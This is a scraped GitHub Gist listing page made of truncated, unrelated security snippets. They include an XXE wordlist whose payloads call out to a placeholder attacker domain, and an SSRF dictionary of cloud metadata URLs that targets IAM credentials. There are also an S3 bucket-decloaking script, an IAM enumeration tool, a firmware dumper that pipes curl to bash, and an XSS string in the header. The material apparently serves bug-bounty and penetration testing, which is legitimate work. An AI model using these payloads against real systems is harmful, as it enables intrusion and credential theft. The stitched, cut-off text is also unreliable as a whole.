🕴️
Hackin'<script>alert(1)</script>

Bitquark bitquark

@honoki
honoki / xxe-payloads.txt
Last active March 27, 2024 18:49
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
:9200/_cluster/health - get the cluster Health
:9200/_cat/indices - get the list of indices
:9200/<index>/_settings - get the settings for an index
:9200/_cat/nodes - get a high level health from each of the nodes (kind of like unix top)
:9200/_mapping - get a list of all mappings from all indices
:9200/<index>/_mapping - get the list of mapping for a given index - (index can be a wild card)
@fransr
fransr / bucket-disclose.sh
Last active May 1, 2024 09:46
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figuring it out. You do need a valid aws-key (never the secret) to properly get the error messages.
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
# you need a valid key, since the errors happen after it validates that the key exists. we do not need the secret key, only the access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@jhaddix
jhaddix / cloud_metadata.txt
Last active April 30, 2024 09:38 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@cryptolok
cryptolok / FirmAD.sh
Created February 28, 2018 00:24
Firmware Automatic Dumping & Extraction Tool
#!/bin/bash
# this tool will automate firmware extraction and unpacking using FT232R-type adaptors (like BusPirate) and a SOIC clip placed on a chip to dump
# install the necessary software:
#$ sudo apt install flashrom binwalk || echo 'git clone?'
# pump up binwalk with additional packages and libraries
#$ bash <(curl -s https://raw.githubusercontent.com/devttys0/binwalk/master/deps.sh)
# place the clip on the chip, connect it to the adaptor, which should be connected to your PC (with drivers installed) and launch the script:
# chip => clip => adaptor => PC => script
@jaredhaight
jaredhaight / givingbacktoinfosec.md
Last active January 28, 2018 13:34
Giving Back to Infosec Talk Resources
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active April 29, 2024 14:36
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. In this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@chadmayfield
chadmayfield / hashcat_macos.sh
Created June 2, 2017 17:24
Install Hashcat on macOS
#!/bin/bash
git clone https://github.com/hashcat/hashcat.git
mkdir -p hashcat/deps
git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
cd hashcat/ && make
./hashcat --version
./hashcat -b -D 1,2
./example0.sh
@darkarnium
darkarnium / EnumerateIam.md
Last active March 9, 2023 15:00
A quick and VERY dirty IAM enumeration tool.

Enumerate IAM

The following code will attempt to enumerate operations that a given set of AWS AccessKeys can perform.

Usage

Usage: enumerate-iam.py [OPTIONS]

  IAM Account Enumerator.